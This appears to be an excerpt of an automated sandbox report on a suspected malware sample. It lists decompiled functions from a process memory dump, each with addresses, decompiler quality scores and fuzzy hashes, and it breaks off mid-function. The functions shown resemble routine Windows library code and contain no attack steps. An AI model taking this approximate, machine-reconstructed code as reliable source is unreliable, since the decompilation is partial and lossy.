                                                    Uniqueness Score: -1.00%

                                                    Function 017B9240 Relevance: .1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E017B9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x188f708);
				E0180D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E017F95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E017F95D0();
				_t33 =  *0x18a84c4; // 0x0
				L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x18a84c4; // 0x0
				L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x18a84c4; // 0x0
				E017D2280(L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x18a86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E017F95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E017F95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E017B9325();
					_t50 =  *0x18a84c4; // 0x0
					return E0180D0D1(L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                    0x017b9240
                                                    0x017b9242
                                                    0x017b9247
                                                    0x017b924c
                                                    0x017b924e
                                                    0x017b9255
                                                    0x017b9257
                                                    0x017b925a
                                                    0x017b925f
                                                    0x017b925f
                                                    0x017b9266
                                                    0x017b9271
                                                    0x017b9276
                                                    0x017b9279
                                                    0x017b927e
                                                    0x017b9295
                                                    0x017b929a
                                                    0x017b92b1
                                                    0x017b92b6
                                                    0x017b92d7
                                                    0x017b92dc
                                                    0x017b92e0
                                                    0x017b92e6
                                                    0x017b92e8
                                                    0x017b92ee
                                                    0x017b9332
                                                    0x017b9333
                                                    0x017b9337
                                                    0x017b9338
                                                    0x017b933a
                                                    0x017b933a
                                                    0x017b933d
                                                    0x017b9342
                                                    0x017b9342
                                                    0x017b9345
                                                    0x017b9349
                                                    0x017b934e
                                                    0x017b9352
                                                    0x017b9357
                                                    0x017b92f4
                                                    0x017b92f4
                                                    0x017b92f6
                                                    0x017b92f9
                                                    0x017b9300
                                                    0x017b9306
                                                    0x017b9324
                                                    0x017b9324

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 217616b252a894ca2acbfb6dc5c7b6612fc270aa907aa2d83ea599042b6bdf42
                                                    • Instruction ID: 8eda5ec16831e5d4fab117a96879b07be41e7e7803fd157c3220ddb81cd820df
                                                    • Opcode Fuzzy Hash: 217616b252a894ca2acbfb6dc5c7b6612fc270aa907aa2d83ea599042b6bdf42
                                                    • Instruction Fuzzy Hash: 0D2178B1042601DFC322EF68CA84F5AF7B9BF18308F51456CA209876A2CB34EA41CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01844257 Relevance: .1, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 90%
                                                    			E01844257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x18908d0);
				E0180D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E018441E8(__ebx, __edi, __ecx, _t39);
				E017CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x18a87e4;
					_t18 =  *0x18a87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x18a5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x18a87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x18a87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L017B7055(_t31 + 0xfffffff8);
								_t24 =  *0x18a87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x18a87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x18a5cd0;
				if( *0x18a5cd0 <= 0) {
					L017B7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x18a87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x18a87e8 = _t30;
						 *0x18a87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0180D0D1(L01844320());
			}















                                                    0x01844257
                                                    0x01844257
                                                    0x01844257
                                                    0x01844259
                                                    0x0184425e
                                                    0x01844263
                                                    0x01844265
                                                    0x01844273
                                                    0x01844278
                                                    0x0184427c
                                                    0x0184427f
                                                    0x01844281
                                                    0x01844287
                                                    0x018442d7
                                                    0x018442d7
                                                    0x018442da
                                                    0x0184428d
                                                    0x0184428d
                                                    0x0184428f
                                                    0x01844292
                                                    0x01844297
                                                    0x0184429c
                                                    0x018442a0
                                                    0x018442a6
                                                    0x018442a8
                                                    0x018442ae
                                                    0x018442b3
                                                    0x00000000
                                                    0x018442ba
                                                    0x018442ba
                                                    0x018442bf
                                                    0x018442c5
                                                    0x018442ca
                                                    0x018442cf
                                                    0x018442d0
                                                    0x00000000
                                                    0x018442d0
                                                    0x018442b3
                                                    0x00000000
                                                    0x018442a6
                                                    0x0184429c
                                                    0x018442dc
                                                    0x018442dc
                                                    0x018442e3
                                                    0x01844309
                                                    0x018442e5
                                                    0x018442e5
                                                    0x018442e8
                                                    0x018442ee
                                                    0x018442f0
                                                    0x00000000
                                                    0x018442f2
                                                    0x018442f2
                                                    0x018442f4
                                                    0x018442f7
                                                    0x018442f9
                                                    0x01844300
                                                    0x01844300
                                                    0x018442f0
                                                    0x0184430e
                                                    0x0184431f

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a776773d858e568532ad4cc3141fb5e40d3a6398f9f9c3a2866c4972b74a338e
                                                    • Instruction ID: e659314912ba7362b8b57f096c56a379cbc6d64c374d8054b65fdc80edcdbaab
                                                    • Opcode Fuzzy Hash: a776773d858e568532ad4cc3141fb5e40d3a6398f9f9c3a2866c4972b74a338e
                                                    • Instruction Fuzzy Hash: 0B218CB0A00619CFE725DF68D040B24BBF1FB86355BA4826EC109CB299EB32D791CF11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017E2397 Relevance: .1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 34%
                                                    			E017E2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x18a848c != 0) {
					L017DFAD0(0x18a8610);
					if( *0x18a848c == 0) {
						E017DFA00(0x18a8610, _t19, _t27, 0x18a8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E017E2581(0x18a8610, 0x17950a0, _t26, _t27, _t28);
						E017DFA00(0x18a8610, 0x17950a0, _t27, 0x18a8610);
					}
				} else {
					L1:
					_t11 =  *0x18a8614; // 0x0
					if(_t11 == 0) {
						_t11 = E017F4886(0x1791088, 1, 0x18a8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E017E2581(0x18a8610, (_t11 << 4) + 0x1795070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                    0x017e23b0
                                                    0x017e23b6
                                                    0x017e2409
                                                    0x017e2415
                                                    0x01825ae9
                                                    0x00000000
                                                    0x017e241b
                                                    0x017e241b
                                                    0x017e241d
                                                    0x017e2427
                                                    0x017e242e
                                                    0x017e2430
                                                    0x017e2430
                                                    0x017e23b8
                                                    0x017e23b8
                                                    0x017e23b8
                                                    0x017e23bf
                                                    0x017e23fc
                                                    0x017e23fc
                                                    0x017e23c1
                                                    0x017e23c3
                                                    0x017e23d0
                                                    0x017e23d8
                                                    0x017e23d8
                                                    0x017e23dc
                                                    0x017e23de
                                                    0x017e23e1
                                                    0x017e23e1
                                                    0x017e23ec

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 91f44168c7857442fbec99c71ed8c936ca868a5d35de4232a525ce585db31fb6
                                                    • Instruction ID: 6c998b600fdeb921293f0903f3837376812f59a7a2a698110195eb54830d8595
                                                    • Opcode Fuzzy Hash: 91f44168c7857442fbec99c71ed8c936ca868a5d35de4232a525ce585db31fb6
                                                    • Instruction Fuzzy Hash: F711443264431167F730963DAC8CB16F6DCBBA5621F58406AE603EB286CAB0E9058B64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 018346A7 Relevance: .1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E018346A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L017D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E017FF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E017ED268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L017D77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                    0x018346b7
                                                    0x018346ba
                                                    0x018346c5
                                                    0x018346c8
                                                    0x018346d0
                                                    0x018346d4
                                                    0x018346e6
                                                    0x018346e9
                                                    0x018346f4
                                                    0x018346ff
                                                    0x01834705
                                                    0x01834706
                                                    0x0183470c
                                                    0x01834713
                                                    0x0183471b
                                                    0x01834723
                                                    0x01834725
                                                    0x018346d6
                                                    0x018346d9
                                                    0x018346db
                                                    0x018346db
                                                    0x01834732

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                    • Instruction ID: 085069e96acc7b67bba892eeb33bf14424146276058f064d20d4e0f48047f8cf
                                                    • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                    • Instruction Fuzzy Hash: 51112572504208BBCB059F5CD8809BEF7B9EF95314F10806EF944CB350DA318E55D3A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017BC962 Relevance: .1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 42%
                                                    			E017BC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x18ad360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E017CEEF0(0x18a70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0183F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E017CEB70(_t29, 0x18a70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E017FB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0183F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x18a70c0; // 0x0
					while(_t38 != 0x18a70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x18ab1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                    0x017bc96a
                                                    0x017bc974
                                                    0x017bc988
                                                    0x017bc98a
                                                    0x01827c9d
                                                    0x01827c9f
                                                    0x01827ca4
                                                    0x01827cae
                                                    0x01827cf0
                                                    0x01827cf5
                                                    0x01827cfa
                                                    0x017bc992
                                                    0x017bc996
                                                    0x017bc997
                                                    0x017bc998
                                                    0x017bc9a3
                                                    0x017bc9a3
                                                    0x01827cb0
                                                    0x01827cb7
                                                    0x01827cbb
                                                    0x00000000
                                                    0x00000000
                                                    0x01827cbd
                                                    0x01827ce8
                                                    0x01827cc5
                                                    0x01827cc8
                                                    0x01827cca
                                                    0x01827cd0
                                                    0x01827cd6
                                                    0x01827cde
                                                    0x01827ce4
                                                    0x01827ce4
                                                    0x01827cd0
                                                    0x00000000
                                                    0x01827ce8
                                                    0x017bc990
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 49da222ae8c8a2f37b78f5b5943322fb784a5ec59d4f146e9a8939765d4a6b3c
                                                    • Instruction ID: 3852da576c31761d71c304420e9cf601fab5525da4fc161ffec523739036636a
                                                    • Opcode Fuzzy Hash: 49da222ae8c8a2f37b78f5b5943322fb784a5ec59d4f146e9a8939765d4a6b3c
                                                    • Instruction Fuzzy Hash: 5211E5317046169BD712AF3DDC85A2BBBE5BBA4710F40052DEA41C3651EF21EE50DBD2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F37F5 Relevance: .1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 87%
                                                    			E017F37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E017D2280(_t6, 0x18a8550);
				}
				_t29 = E017F387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E017CFFB0(0x18a8550, _t27, 0x18a8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                    0x017f37fa
                                                    0x017f37fc
                                                    0x017f3805
                                                    0x017f3808
                                                    0x017f3808
                                                    0x017f3814
                                                    0x017f3818
                                                    0x017f3846
                                                    0x017f3848
                                                    0x017f384b
                                                    0x017f384b
                                                    0x017f3852
                                                    0x00000000
                                                    0x017f3854
                                                    0x017f3856
                                                    0x00000000
                                                    0x00000000
                                                    0x017f3863
                                                    0x00000000
                                                    0x017f3863
                                                    0x017f381a
                                                    0x017f381a
                                                    0x017f381f
                                                    0x017f386e
                                                    0x017f386e
                                                    0x017f3871
                                                    0x017f3873
                                                    0x017f3873
                                                    0x017f3868
                                                    0x00000000
                                                    0x017f3868
                                                    0x017f3821
                                                    0x017f3826
                                                    0x00000000
                                                    0x00000000
                                                    0x017f3828
                                                    0x017f382a
                                                    0x017f3841
                                                    0x00000000
                                                    0x017f3841

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1b7bba1fae6275c2c6ff1478752a65dbd57a336f0e6dc8e5cb5106d19abc5cd9
                                                    • Instruction ID: b9242f6978e2b7d042caf7abd991ba78cdc81dd1075bd439eb530997788c1e68
                                                    • Opcode Fuzzy Hash: 1b7bba1fae6275c2c6ff1478752a65dbd57a336f0e6dc8e5cb5106d19abc5cd9
                                                    • Instruction Fuzzy Hash: 0801C4B29856119BC3378B1D9940A27FBA6FF85B61F16406DEA458B315DB38DC01C7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017E002D Relevance: .1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E017E002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E017D7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E017D7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E017D7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E017D7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                    0x017e0032
                                                    0x017e0037
                                                    0x017e0043
                                                    0x01824b3a
                                                    0x017e0049
                                                    0x017e0049
                                                    0x017e0049
                                                    0x017e004e
                                                    0x017e0053
                                                    0x01824b48
                                                    0x01824b5a
                                                    0x01824b4a
                                                    0x01824b53
                                                    0x01824b53
                                                    0x01824b5f
                                                    0x00000000
                                                    0x01824b61
                                                    0x00000000
                                                    0x01824b61
                                                    0x017e0059
                                                    0x017e0059
                                                    0x017e0060
                                                    0x01824b6f
                                                    0x01824b6f
                                                    0x017e0069
                                                    0x01824b83
                                                    0x00000000
                                                    0x00000000
                                                    0x01824b90
                                                    0x01824b9b
                                                    0x01824b9b
                                                    0x01824ba4
                                                    0x00000000
                                                    0x00000000
                                                    0x01824baa
                                                    0x00000000
                                                    0x017e006f
                                                    0x017e006f
                                                    0x00000000
                                                    0x017e006f
                                                    0x017e0069

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                    • Instruction ID: 0e290dfac06a69e64bccab911fe972287562d15d7cab585893dbf627606e139b
                                                    • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                    • Instruction Fuzzy Hash: A911C4327056918FE72397ACC95CB35BBE4AF46B58F0900E0ED04D7A92D768D9C1C270
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017C766D Relevance: .1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E017C766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E017EF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E017EF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L017D4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                    0x017c7672
                                                    0x017c767f
                                                    0x017c7689
                                                    0x017c76de
                                                    0x017c76de
                                                    0x017c768b
                                                    0x017c7691
                                                    0x017c7693
                                                    0x017c7697
                                                    0x00000000
                                                    0x017c7699
                                                    0x017c76a8
                                                    0x00000000
                                                    0x017c76aa
                                                    0x017c76ad
                                                    0x017c76b1
                                                    0x00000000
                                                    0x017c76b3
                                                    0x017c76b3
                                                    0x017c76b5
                                                    0x017c76ba
                                                    0x017c76bc
                                                    0x017c76bc
                                                    0x017c76c0
                                                    0x00000000
                                                    0x017c76c2
                                                    0x017c76ce
                                                    0x017c76ce
                                                    0x017c76c0
                                                    0x017c76b1
                                                    0x017c76a8
                                                    0x017c7697
                                                    0x017c76d9

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                    • Instruction ID: 8835f8a8f8685149a75fda7a420cdec1dce3e0755ff68ded451df74172025a4b
                                                    • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                    • Instruction Fuzzy Hash: 3A018832700119ABD7249E5ECC85E5BFBEDEB94B60B14052CBA09DB254DE30DD119BA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017B9080 Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 69%
                                                    			E017B9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x18a85ec;
				E017D2280(_t48, 0x18a85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E017CFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x18a538c; // 0x77e16828
					if( *_t84 != 0x18a5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x188f6e8);
						E0180D0E8(0x18a85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E018888F5(_t80, _t85, 0x18a5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x18a86c0; // 0x12807b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x18a86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E017D2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E018888F5(0x18a85ec, _t85, 0x18a5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E017FAFD0();
											}
											while(1) {
